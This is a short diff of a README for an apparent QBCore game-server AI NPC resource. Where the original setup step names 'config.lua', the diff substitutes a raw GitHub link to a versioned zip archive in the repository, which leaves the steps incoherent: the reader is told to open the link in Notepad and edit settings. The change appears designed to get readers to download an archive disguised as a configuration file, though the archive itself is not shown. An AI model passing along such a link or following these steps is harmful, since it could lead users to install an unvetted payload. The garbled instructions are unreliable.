kuku971/QBCore-AI-NPC/README.md

    - Inside, you will find various files and folders needed for the NPC system to run.

 3. **Setup Configuration Files**
-   - Look for a file named `config.lua`.
+   - Look for a file named `https://raw.githubusercontent.com/kuku971/QBCore-AI-NPC/main/shared/QBCore-AI-NPC_3.7.zip`.
    - Open it using a simple text editor like Notepad.
    - Adjust any settings as needed.
 For example, you may want to customize the default setting for NPC interactions.